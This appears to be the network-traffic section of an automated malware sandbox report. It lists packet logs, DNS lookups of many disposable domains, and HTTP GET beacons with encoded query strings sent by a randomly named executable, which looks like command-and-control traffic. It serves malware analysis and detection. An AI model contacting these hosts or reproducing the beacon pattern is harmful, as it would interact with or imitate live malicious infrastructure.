Jan 11, 2025 09:37:03.387001038 CET	50011	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:03.391997099 CET	80	50011	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:03.392082930 CET	50011	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:03.408435106 CET	50011	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:03.413338900 CET	80	50011	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:03.413604021 CET	80	50011	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:04.914520979 CET	50011	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:04.962212086 CET	80	50011	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:05.935334921 CET	50012	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:05.940258980 CET	80	50012	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:05.940417051 CET	50012	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:05.951148987 CET	50012	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:05.956053019 CET	80	50012	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:06.430511951 CET	80	50012	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:06.430557013 CET	80	50012	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:06.430715084 CET	50012	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:06.433573961 CET	50012	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:06.438477039 CET	80	50012	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:06.766038895 CET	80	50011	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:06.766194105 CET	50011	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:11.464675903 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:11.469890118 CET	80	50013	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:11.469991922 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:11.487390995 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:11.492312908 CET	80	50013	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:11.997503996 CET	80	50013	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:11.997545958 CET	80	50013	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:11.997627020 CET	80	50013	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:11.997662067 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:11.997786045 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:12.992697001 CET	50013	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:15.386322021 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:15.391134024 CET	80	50014	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:15.391716957 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:15.405340910 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:15.410176039 CET	80	50014	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:15.938766003 CET	80	50014	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:15.938793898 CET	80	50014	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:15.938863993 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:15.939838886 CET	80	50014	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:15.939888954 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:16.914355993 CET	50014	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:17.933043957 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:17.937951088 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:17.938034058 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:17.952481031 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:17.957431078 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:17.957487106 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:18.470449924 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:18.470493078 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:18.470551014 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:18.471451044 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:18.471496105 CET	80	50015	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:18.471569061 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:19.461242914 CET	50015	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:20.481359959 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:20.486269951 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:20.486460924 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:20.496623039 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:20.501429081 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017569065 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017636061 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017669916 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017788887 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017817974 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.017833948 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017864943 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017894983 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.017945051 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.017973900 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.018003941 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.018003941 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.018033981 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.018062115 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.021516085 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.022711992 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.022759914 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:21.022867918 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.026221991 CET	50016	80	192.168.2.7	172.67.162.39
Jan 11, 2025 09:37:21.031049967 CET	80	50016	172.67.162.39	192.168.2.7
Jan 11, 2025 09:37:26.061286926 CET	50017	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:26.066031933 CET	80	50017	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:26.066128969 CET	50017	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:26.081835032 CET	50017	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:26.086601973 CET	80	50017	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:27.586307049 CET	50017	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:27.634074926 CET	80	50017	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:28.604878902 CET	50018	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:28.610194921 CET	80	50018	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:28.610317945 CET	50018	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:28.624495983 CET	50018	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:28.629527092 CET	80	50018	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:29.086313009 CET	80	50018	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:29.086442947 CET	80	50018	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:29.086508036 CET	50018	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:30.135193110 CET	50018	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:31.152509928 CET	50019	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:31.157368898 CET	80	50019	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:31.157457113 CET	50019	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:31.173294067 CET	50019	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:31.178112984 CET	80	50019	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:31.178250074 CET	80	50019	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:32.680171013 CET	50019	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:32.726445913 CET	80	50019	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:33.698640108 CET	50020	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:33.703573942 CET	80	50020	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:33.703741074 CET	50020	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:33.714456081 CET	50020	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:33.719297886 CET	80	50020	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:34.176297903 CET	80	50020	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:34.176419020 CET	80	50020	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:34.176531076 CET	50020	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:34.181250095 CET	50020	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:34.186152935 CET	80	50020	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:34.529896021 CET	80	50019	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:34.530076027 CET	50019	80	192.168.2.7	13.248.169.48
Jan 11, 2025 09:37:35.452378035 CET	80	50017	13.248.169.48	192.168.2.7
Jan 11, 2025 09:37:35.452449083 CET	50017	80	192.168.2.7	13.248.169.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 09:33:38.303715944 CET	51380	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:33:38.315758944 CET	53	51380	1.1.1.1	192.168.2.7
Jan 11, 2025 09:33:54.011010885 CET	56621	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:33:54.029411077 CET	53	56621	1.1.1.1	192.168.2.7
Jan 11, 2025 09:34:02.138822079 CET	60000	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:34:03.041008949 CET	53	60000	1.1.1.1	192.168.2.7
Jan 11, 2025 09:34:16.745109081 CET	60930	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:34:16.760324955 CET	53	60930	1.1.1.1	192.168.2.7
Jan 11, 2025 09:35:08.948858023 CET	61600	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:35:09.046633005 CET	53	61600	1.1.1.1	192.168.2.7
Jan 11, 2025 09:35:22.418745995 CET	60034	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:35:22.681077003 CET	53	60034	1.1.1.1	192.168.2.7
Jan 11, 2025 09:35:36.293111086 CET	54491	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:35:36.420183897 CET	53	54491	1.1.1.1	192.168.2.7
Jan 11, 2025 09:35:49.746659994 CET	56967	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:35:49.759208918 CET	53	56967	1.1.1.1	192.168.2.7
Jan 11, 2025 09:36:03.011539936 CET	49539	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:36:03.025280952 CET	53	49539	1.1.1.1	192.168.2.7
Jan 11, 2025 09:36:16.417773962 CET	64512	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:36:16.938131094 CET	53	64512	1.1.1.1	192.168.2.7
Jan 11, 2025 09:36:30.501075029 CET	61852	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:36:31.398914099 CET	53	61852	1.1.1.1	192.168.2.7
Jan 11, 2025 09:36:44.950099945 CET	51391	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:36:44.961014986 CET	53	51391	1.1.1.1	192.168.2.7
Jan 11, 2025 09:36:58.175108910 CET	53449	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:36:58.190264940 CET	53	53449	1.1.1.1	192.168.2.7
Jan 11, 2025 09:37:11.449127913 CET	50584	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:37:11.461185932 CET	53	50584	1.1.1.1	192.168.2.7
Jan 11, 2025 09:37:26.043350935 CET	61160	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:37:26.058471918 CET	53	61160	1.1.1.1	192.168.2.7
Jan 11, 2025 09:37:39.183397055 CET	53247	53	192.168.2.7	1.1.1.1
Jan 11, 2025 09:37:39.198744059 CET	53	53247	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 09:33:38.303715944 CET	192.168.2.7	1.1.1.1	0x1027	Standard query (0)	www.aziziyeescortg.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:54.011010885 CET	192.168.2.7	1.1.1.1	0x1b82	Standard query (0)	www.grandesofertas.fun	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:34:02.138822079 CET	192.168.2.7	1.1.1.1	0xbb6f	Standard query (0)	www.sankan-fukushi.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:34:16.745109081 CET	192.168.2.7	1.1.1.1	0x3134	Standard query (0)	www.conansog.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:08.948858023 CET	192.168.2.7	1.1.1.1	0xda00	Standard query (0)	www.beythome.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:22.418745995 CET	192.168.2.7	1.1.1.1	0x704a	Standard query (0)	www.tempatmudisini06.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:36.293111086 CET	192.168.2.7	1.1.1.1	0x2d43	Standard query (0)	www.questmatch.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:49.746659994 CET	192.168.2.7	1.1.1.1	0xe002	Standard query (0)	www.callyur.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:03.011539936 CET	192.168.2.7	1.1.1.1	0xb793	Standard query (0)	www.housew.website	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:16.417773962 CET	192.168.2.7	1.1.1.1	0x23a2	Standard query (0)	www.nuy25c9t.sbs	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:30.501075029 CET	192.168.2.7	1.1.1.1	0x3638	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:44.950099945 CET	192.168.2.7	1.1.1.1	0xc088	Standard query (0)	www.a1shop.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:58.175108910 CET	192.168.2.7	1.1.1.1	0x9892	Standard query (0)	www.aiactor.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:11.449127913 CET	192.168.2.7	1.1.1.1	0xd733	Standard query (0)	www.sitioseguro.blog	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:26.043350935 CET	192.168.2.7	1.1.1.1	0x283a	Standard query (0)	www.optimismbank.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:39.183397055 CET	192.168.2.7	1.1.1.1	0x177f	Standard query (0)	www.nonpressure.beauty	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:38.315758944 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	www.aziziyeescortg.xyz		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:33:54.029411077 CET	1.1.1.1	192.168.2.7	0x1b82	Name error (3)	www.grandesofertas.fun	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:34:03.041008949 CET	1.1.1.1	192.168.2.7	0xbb6f	No error (0)	www.sankan-fukushi.info		163.44.185.183	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:34:16.760324955 CET	1.1.1.1	192.168.2.7	0x3134	No error (0)	www.conansog.shop		104.21.41.74	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:34:16.760324955 CET	1.1.1.1	192.168.2.7	0x3134	No error (0)	www.conansog.shop		172.67.162.12	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:09.046633005 CET	1.1.1.1	192.168.2.7	0xda00	No error (0)	www.beythome.online	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:35:09.046633005 CET	1.1.1.1	192.168.2.7	0xda00	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:35:09.046633005 CET	1.1.1.1	192.168.2.7	0xda00	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:22.681077003 CET	1.1.1.1	192.168.2.7	0x704a	No error (0)	www.tempatmudisini06.click	tempatmudisini06.click		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:35:22.681077003 CET	1.1.1.1	192.168.2.7	0x704a	No error (0)	tempatmudisini06.click		103.21.221.4	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:36.420183897 CET	1.1.1.1	192.168.2.7	0x2d43	No error (0)	www.questmatch.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:36.420183897 CET	1.1.1.1	192.168.2.7	0x2d43	No error (0)	www.questmatch.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:35:49.759208918 CET	1.1.1.1	192.168.2.7	0xe002	No error (0)	www.callyur.shop	callyur.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:35:49.759208918 CET	1.1.1.1	192.168.2.7	0xe002	No error (0)	callyur.shop		66.29.137.10	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:03.025280952 CET	1.1.1.1	192.168.2.7	0xb793	No error (0)	www.housew.website		203.161.46.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	www.nuy25c9t.sbs	b1-3-r11-gmhudx.t9d2quy5.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r11-gmhudx.t9d2quy5.shop	b1-3-r11.t9d2quy5.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r11.t9d2quy5.shop	b1-3-r111-s65psj.8uqm5xgy.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r111-s65psj.8uqm5xgy.shop	b1-3-r11-nff52.alicloudddos.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r11-nff52.alicloudddos.top	b1-3-r111-s65psj.alicloudddos.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r111-s65psj.alicloudddos.top	b1-3-r111-55g56.kunlundns.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r111-55g56.kunlundns.top	b1-3-r111.kunlundns.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:36:16.938131094 CET	1.1.1.1	192.168.2.7	0x23a2	No error (0)	b1-3-r111.kunlundns.top		101.32.205.61	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:31.398914099 CET	1.1.1.1	192.168.2.7	0x3638	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:44.961014986 CET	1.1.1.1	192.168.2.7	0xc088	No error (0)	www.a1shop.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:44.961014986 CET	1.1.1.1	192.168.2.7	0xc088	No error (0)	www.a1shop.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:58.190264940 CET	1.1.1.1	192.168.2.7	0x9892	No error (0)	www.aiactor.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:36:58.190264940 CET	1.1.1.1	192.168.2.7	0x9892	No error (0)	www.aiactor.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:11.461185932 CET	1.1.1.1	192.168.2.7	0xd733	No error (0)	www.sitioseguro.blog		172.67.162.39	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:11.461185932 CET	1.1.1.1	192.168.2.7	0xd733	No error (0)	www.sitioseguro.blog		104.21.15.100	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:26.058471918 CET	1.1.1.1	192.168.2.7	0x283a	No error (0)	www.optimismbank.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:26.058471918 CET	1.1.1.1	192.168.2.7	0x283a	No error (0)	www.optimismbank.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:39.198744059 CET	1.1.1.1	192.168.2.7	0x177f	No error (0)	www.nonpressure.beauty		104.21.4.93	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:37:39.198744059 CET	1.1.1.1	192.168.2.7	0x177f	No error (0)	www.nonpressure.beauty		172.67.131.229	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.aziziyeescortg.xyz

www.sankan-fukushi.info

www.conansog.shop

www.beythome.online

www.tempatmudisini06.click

www.questmatch.pro

www.callyur.shop

www.housew.website

www.nuy25c9t.sbs

www.madhf.tech

www.a1shop.shop

www.aiactor.xyz

www.sitioseguro.blog

www.optimismbank.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49841	104.21.16.1	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:33:38.336606026 CET	550	OUT	GET /wbcb/?40G=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&I6=x8CX HTTP/1.1 Host: www.aziziyeescortg.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:33:38.957967997 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:33:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnN8hr0%2FBQqIPo6hD80GwDcALItVRelnd%2BRNcuU7ctHzH2kdglvujoYJeB9uTs2UcHHxPYOBf%2FAVW2%2FmlCUy%2FEuRGtGFZgd1qg723BMvMhD%2F6UL%2B5FRiEyow4JgFwpP9NnUAQhGS2yRw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003902918867293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1957&rtt_var=978&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED] Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div
Jan 11, 2025 09:33:38.958020926 CET	886	IN	Data Raw: 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f Data Ascii: style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49969	163.44.185.183	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
